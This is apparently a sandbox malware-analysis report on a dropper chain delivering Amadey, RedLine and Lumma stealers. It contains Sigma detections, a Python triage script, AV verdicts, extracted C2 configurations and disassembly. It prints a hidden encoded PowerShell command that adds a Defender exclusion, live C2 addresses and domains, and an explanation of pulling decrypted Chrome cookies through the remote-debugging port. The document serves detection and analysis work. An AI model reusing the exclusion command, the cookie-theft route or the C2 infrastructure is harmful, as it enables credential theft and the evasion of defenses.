Source: Process started | Author: frack113 | Data: Command: "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=, CommandLine: "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe, ParentProcessId: 632, ParentProcessName: 0a7e8af92e.exe, ProcessCommandLine: "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=, ProcessId: 6216, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=, CommandLine: "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe, ParentProcessId: 632, ParentProcessName: 0a7e8af92e.exe, ProcessCommandLine: "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=, ProcessId: 6216, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6892, ProcessName: svchost.exe
No Suricata rule has matched
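The Sigma hits above come from behaviours that are also visible in the process tree: skotes.exe writing a Run value that points at a payload under Temp, 0a7e8af92e.exe launching hidden PowerShell with a base64-encoded MpPreference cmdlet, e6e4c20fad.exe starting Chrome with --remote-debugging-port (the route behind the "Attempt to bypass Chrome Application-Bound Encryption" signature: a DevTools client attached to that port can ask the running browser for cookies it has already decrypted, so the on-disk key binding never has to be broken), and fb584dabd7.exe killing every installed browser before relaunching Firefox in kiosk mode on a Google sign-in URL. The decoded PowerShell is Add-MpPreference -ExclusionPath '...\AppData\Roaming\r3yhfqlfwevGCAOVPFS', the folder DJj.exe (the RedLine payload) is later started from; the base64 carries the literal account name of the analysis machine, whereas the report displays it as user. The Python below is an added example, not Joe Sandbox code and not part of the Sigma rules: it decodes the -EncodedCommand argument (base64 over UTF-16LE, which is why a plain base64 decode shows a NUL after every character) and runs those checks over events constructed from the command lines in this report. The event dict layout and the finding names are this example's own.

```python
import base64
import binascii
import re
from typing import List, Optional

# Constructed sample events. Command lines, parent images and the Run-key write are
# copied from the process tree and Sigma hits in this report; the dict layout is this
# example's own, not a Joe Sandbox or Sysmon schema.
ENCODED_PS = "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA="
TEMP = r"C:\Users\user\AppData\Local\Temp"

SAMPLE_EVENTS = [
    {"type": "process",
     "cmdline": '"powershell.exe" -WindowStyle Hidden -EncodedCommand ' + ENCODED_PS,
     "parent": TEMP + r"\1021708001\0a7e8af92e.exe"},
    {"type": "process",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""',
     "parent": TEMP + r"\1021714001\e6e4c20fad.exe"},
    {"type": "process", "cmdline": "taskkill /F /IM chrome.exe /T",
     "parent": TEMP + r"\1021715001\fb584dabd7.exe"},
    {"type": "process",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking',
     "parent": TEMP + r"\1021715001\fb584dabd7.exe"},
    {"type": "registry",
     "image": TEMP + r"\abc3bc1985\skotes.exe",
     "key": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b9ba85c997.exe",
     "value": TEMP + r"\1021713001\b9ba85c997.exe"},
    {"type": "process", "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS",
     "parent": ""},
]

# PowerShell accepts -EncodedCommand and its unambiguous prefixes (-e, -ec, -enc, ...);
# this pattern covers the forms seen in the wild without a full prefix matcher.
ENC_FLAG = re.compile(r"\s-(?:e|ec|enc(?:odedcommand)?)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\AppData\\(?:Local\\Temp|Roaming)\\", re.IGNORECASE)
MP_PREFERENCE = re.compile(r"\b(?:Add|Set)-MpPreference\b", re.IGNORECASE)
BROWSER_IMAGES = {"chrome.exe", "firefox.exe", "msedge.exe", "opera.exe", "brave.exe"}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a powershell -EncodedCommand argument, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        # -EncodedCommand is base64 over UTF-16LE, not UTF-8.
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage_event(ev: dict) -> List[str]:
    """Apply the checks behind the Sigma hits above to one constructed event."""
    findings: List[str] = []
    if ev["type"] == "registry":
        if "\\CurrentVersion\\Run\\" in ev["key"] and USER_WRITABLE.search(ev["value"]):
            findings.append("run-key-to-user-writable-dir")
        return findings
    cmd = ev["cmdline"]
    if USER_WRITABLE.search(ev.get("parent", "")):
        findings.append("parent-in-user-writable-dir")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append("encoded-powershell")
        if MP_PREFERENCE.search(decoded):
            findings.append("defender-preference-change")
    if re.search(r"--remote-debugging-port=\d+", cmd):
        findings.append("browser-remote-debugging")
    if re.search(r"(?:^|\s)--kiosk(?:\s|$)", cmd):
        findings.append("browser-kiosk-mode")
    m = re.search(r"\btaskkill\b.*?/IM\s+(\S+)", cmd, re.IGNORECASE)
    if m and m.group(1).lower() in BROWSER_IMAGES:
        findings.append("browser-kill")
    return findings


def triage(events: List[dict]) -> List[List[str]]:
    """Findings per event, in input order."""
    return [triage_event(ev) for ev in events]


if __name__ == "__main__":
    for ev, found in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        label = ev.get("cmdline") or ev["key"]
        print(f"{label[:60]:60} -> {found or 'clean'}")
    print(decode_encoded_command(SAMPLE_EVENTS[0]["cmdline"]))
```

Run as a script to print the verdict per event. The parent-path check is deliberately broad (anything executing from Temp or Roaming); in production, pair it with image signature or prevalence to keep noise down, and treat a decoded Add-MpPreference or Set-MpPreference as high severity on its own.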


                    AV Detection

                    Source: cMTqzvmx9u.exeAvira: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[4].exeAvira: detection malicious, Label: HEUR/AGEN.1320706
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[3].exe | Avira: detection malicious, Label: TR/ATRAPS.Gen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[3].exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[3].exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Source: 00000003.00000002.1522880580.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp | Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                    Source: 11.2.0a7e8af92e.exe.1c1310fe590.3.unpack | Malware Configuration Extractor: RedLine {"C2 url": "147.45.44.224:1912", "Bot Id": "1488Traffer", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
                    Source: 19.2.7ddd2a748c.exe.400000.0.raw.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["pancakedipyps.click", "tentabatte.lat", "talkynicer.lat", "slipperyloo.lat", "bashfulacid.lat", "manyrestro.lat", "shapestickyr.lat", "wordyfindy.lat", "curverpluch.lat"], "Build id": "FATE99--test"}
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe | ReversingLabs: Detection: 73%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exe | ReversingLabs: Detection: 30%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exe | ReversingLabs: Detection: 78%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[2].exe | ReversingLabs: Detection: 57%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe | ReversingLabs: Detection: 52%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[2].exe | ReversingLabs: Detection: 63%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[4].exe | ReversingLabs: Detection: 86%
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe | ReversingLabs: Detection: 78%
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe | ReversingLabs: Detection: 52%
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe | ReversingLabs: Detection: 30%
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe | ReversingLabs: Detection: 57%
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe | ReversingLabs: Detection: 63%
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe | ReversingLabs: Detection: 73%
                    Source: C:\Users\user\AppData\Local\Temp\1021720001\91732ff836.exe | ReversingLabs: Detection: 86%
                    Source: C:\Users\user\AppData\Local\Temp\1021721001\f53b3c5fe2.exe | ReversingLabs: Detection: 78%
                    Source: C:\Users\user\AppData\Local\Temp\1021722001\aa8c9de034.exe | ReversingLabs: Detection: 63%
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | ReversingLabs: Detection: 50%
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | ReversingLabs: Detection: 87%
                    Source: cMTqzvmx9u.exe | ReversingLabs: Detection: 50%
                    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exe | Joe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe | Joe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[4].exe | Joe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[3].exe | Joe Sandbox ML: detected
                    Source: cMTqzvmx9u.exe | Joe Sandbox ML: detected
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: bashfulacid.lat
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: tentabatte.lat
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: curverpluch.lat
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: talkynicer.lat
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: shapestickyr.lat
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: manyrestro.lat
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: slipperyloo.lat
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: wordyfindy.lat
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: pancakedipyps.click
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: Workgroup: -
                    Source: 00000013.00000002.2408315815.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: FATE99--test
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 9_2_00FE58D5 CryptUnprotectData, | 9_2_00FE58D5
                    Source: cMTqzvmx9u.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe | Directory created: C:\Program Files\Google\Chrome\Extensions
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe | Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe | Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe | Directory created: C:\Program Files\Windows Media Player\graph
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe | Directory created: C:\Program Files\Windows Media Player\graph\graph.exe
                    Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: 68f6adf5d5.exe, 00000018.00000003.2537949990.0000017A8C7E7000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000001C.00000000.2538575063.00007FF740999000.00000002.00000001.01000000.00000016.sdmp, graph.exe, 0000001E.00000000.2689593141.00007FF740999000.00000002.00000001.01000000.00000016.sdmp
                    Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: 68f6adf5d5.exe, 00000018.00000000.2410677294.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000018.00000002.2603643125.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp
                    Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: 68f6adf5d5.exe, 00000018.00000000.2410677294.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000018.00000002.2603643125.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp
                    Source: Binary string: .pdbyy: source: 0a7e8af92e.exe, 0000000B.00000002.2345610829.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmp, 0a7e8af92e.exe, 0000000B.00000000.2185582729.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmp
                    Source: Binary string: C:\Admin\Workspace\1766103906\Project\Release\Project.pdb source: ba944ca4ff.exe, 0000000F.00000000.2277534376.0000000000F2C000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: 68f6adf5d5.exe, 00000018.00000003.2537949990.0000017A8C7E7000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000001C.00000000.2538575063.00007FF740999000.00000002.00000001.01000000.00000016.sdmp, graph.exe, 0000001E.00000000.2689593141.00007FF740999000.00000002.00000001.01000000.00000016.sdmp
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe | Directory queried: number of queries: 1001
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe | Directory queried: number of queries: 1001
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe | Directory queried: number of queries: 1001
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h | 9_2_01010340
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov word ptr [eax], cx | 9_2_00FF1A10
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then movzx ecx, byte ptr [edx+eax] | 9_2_00FF3B50
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov byte ptr [ebx], al | 9_2_00FFD34A
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx-16h] | 9_2_01010D20
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov edi, dword ptr [esi+30h] | 9_2_00FDCC7A
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov eax, ebx | 9_2_00FF7440
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+09AD4080h] | 9_2_00FF7440
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-16h] | 9_2_01011720
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov ecx, eax | 9_2_00FF2E6D
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then jmp edx | 9_2_00FF2E6D
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then movzx ecx, byte ptr [edx+eax] | 9_2_00FF2E6D
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov edx, ebx | 9_2_00FD8600
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov edx, ecx | 9_2_00FEB8F6
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov byte ptr [ebx], al | 9_2_00FFC0E6
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov byte ptr [ebx], al | 9_2_00FFE0DA
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov ecx, eax | 9_2_00FED8D8
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov esi, ecx | 9_2_00FF90D0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov ecx, eax | 9_2_00FED8AC
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov eax, ebx | 9_2_00FEC8A0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-000000BEh] | 9_2_00FEC8A0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+edx+0Ah] | 9_2_00FEC8A0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2E3D7ACEh] | 9_2_00FEC8A0
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-16h] | 9_2_01011160
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov byte ptr [ebx], al | 9_2_00FFC09E
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h | 9_2_0100C990
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov byte ptr [edi], al | 9_2_00FFC850
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h | 9_2_00FF2830
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then push esi | 9_2_00FDC805
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h | 9_2_00FF89E9
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx+04h] | 9_2_0100C830
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h | 9_2_00FF81CC
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then jmp edx | 9_2_00FF39B9
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then movzx ecx, byte ptr [edx+eax] | 9_2_00FF39B9
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov byte ptr [edi], al | 9_2_00FFB980
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov ecx, eax | 9_2_00FFD17D
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h | 9_2_00FFB170
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Code function: 4x nop then mov eax, dword ptr [01016130h] | 9_2_00FE8169
